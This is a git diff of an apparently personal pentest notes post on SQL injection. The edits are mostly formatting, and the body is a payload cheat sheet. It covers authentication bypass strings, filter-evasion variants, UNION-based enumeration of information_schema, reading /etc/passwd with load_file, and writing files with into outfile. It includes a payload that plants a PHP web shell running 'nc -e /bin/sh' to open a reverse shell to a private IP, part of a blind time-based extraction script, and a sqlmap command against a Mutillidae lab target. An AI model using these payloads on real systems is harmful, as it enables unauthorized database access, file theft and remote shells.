--- a/_posts/notes/databases/2021-12-12-sqli.md
+++ b/_posts/notes/databases/2021-12-12-sqli.md
@@ -1,23 +1,25 @@
 ---
 layout: post
 title: 'Notes | SQL'
-date: 2021-12-12
 permalink: /notes/databases/sql/
 ---
-# [](#header-4)Basic access
+
+# Basic access
 Maybe the database have the default login, we can try with:
-{% highlight plain %}
+{% highlight mysql %}
 > mysql -u root -h <ip>
 {% endhighlight %}
 
-# [](#header-4)Basic Injection
+---
+
+# Basic Injection
 If we can send a query to the database to log, we can do:
-{% highlight plain %}
+{% highlight mysql %}
 ' or '1'='1' --
 {% endhighlight %}
 
 Probably we need to change the text to bypass filter:
-{% highlight plain %}
+{% highlight mysql %}
 aNd 1=1
 aNd 21=21
 orDeR bY 1
@@ -26,7 +28,7 @@ orDer/\*\*/bY/\*\*/1
 orDer%20bY%201
 {% endhighlight %}
 We can change the spaces by:
-{% highlight plain %}
+{% highlight mysql %}
 +, /**/, %20
 {% endhighlight %}
 
@@ -41,20 +43,21 @@ Some others comment can be:
 
 ##### Probably, we need to add **;** at the end of the query (before the comment).
 
-
 Also, we can try to catch the login request with burp and send the SQLi with it.
+  
+---
 
-# [](#header-4)Error Based
+# Error Based
 When we see an SQL error in the page we can try to gather information of the web.
 Adding and:
-{% highlight plain %}
+{% highlight mysql %}
 ... ORDER BY 5; --
 {% endhighlight %}
 We can check how many rows are in the query.
 ##### (We can change **--** to others SQL comments.)
 
 Then we can do an union with the columns:
-{% highlight plain %}
+{% highlight mysql %}
 ... UNION SELECT 1,2,3,4,5;
 ... UNION SELECT NULL,NULL,NULL,NULL,NULL;
 {% endhighlight %}
@@ -65,52 +68,54 @@ We can use to enumerate the following functions, replacing the numbers or NULL:
 - load_file('/etc/password')
 
 Now we can get the tables from the database:
-{% highlight plain %}
+{% highlight mysql %}
 ... UNION SELECT table_name,NULL FROM information_schema.tables WHERE table_schema = "database-name";
 {% endhighlight %}
 
 Or the others databases:
-{% highlight plain %}
+{% highlight mysql %}
 ... UNION SELECT schema_name,NULL FROM information_schema.schemata;
 {% endhighlight %}
 Some databases can limit the amount on databases show, we can try to change it with limit:
-{% highlight plain %}
+{% highlight mysql %}
 ... UNION SELECT schema_name,NULL FROM information_schema.schemata LIMIT 1,1; -- This will show the first one
 ... UNION SELECT schema_name,NULL FROM information_schema.schemata LIMIT 2,1; -- This will show the second one
 {% endhighlight %}
 
 To get the columns of a table:
-{% highlight plain %}
+{% highlight mysql %}
 ... UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_schema = "database-name" AND table_name = "table-name";
 {% endhighlight %}
 
 We can use this syntax to read and write system files:
-{% highlight plain %}
+{% highlight mysql %}
 ... UNION SELECT load_file('/etc/passwd'), NULL;
 ... UNION SELECT 'SUS', NULL into outfile '/tmp/attack.txt;
 {% endhighlight %}
 And then create a reverse shell:
-{% highlight plain %}
+{% highlight mysql %}
 ' union select null,'<?passthru("nc -e /bin/sh 192.168.1.134 9000");?>' into outfile '/tmp/shell.php'#
 {% endhighlight %}
 
 If we can not pass a string like **"database-name"** we can encode it:
-{% highlight plain %}
+{% highlight mysql %}
 > echo "database-name" | xxd -ps
 {% endhighlight %}
 ##### (We may remove the **0a**, and add a **0x** at the beggining.)
 
-# [](#header-4)Time Based (Blind)
+---
+
+# Time Based (Blind)
 We can make sleep the sql function in order to guess if the page is not displaying anything.
 
 For example:
-{% highlight plain %}
+{% highlight mysql %}
 ... 'admin' and sleep(5) --If the user is correct it will wait 5 sec 
 ... AND if(substr(database(),1,1)='c', sleep(5),1); --
 {% endhighlight %}
 
 We can make a Python Script:
-{% highlight plain %}
+{% highlight python %}
 #!/usr/bin/python3
 
 import requests, time, sys, signal
@@ -158,9 +163,11 @@ log.info("Database: %s" % result)
 
 We can change **database()** from the others functions in the **Error Based** to guess another values (tables, columns,...).
 
-# [](#header-4)SQLmap
+---
+
+# SQLmap
 We can try searching a URL with:
-{% highlight plain %}
+{% highlight bash %}
 > sqlmap -u "http://192.168.1.137/mutillidae/index.php?page=user-info.php&username=admin&password=aaaa&user-info-php-submit-button=View+Account+Details"
 {% endhighlight %}
 
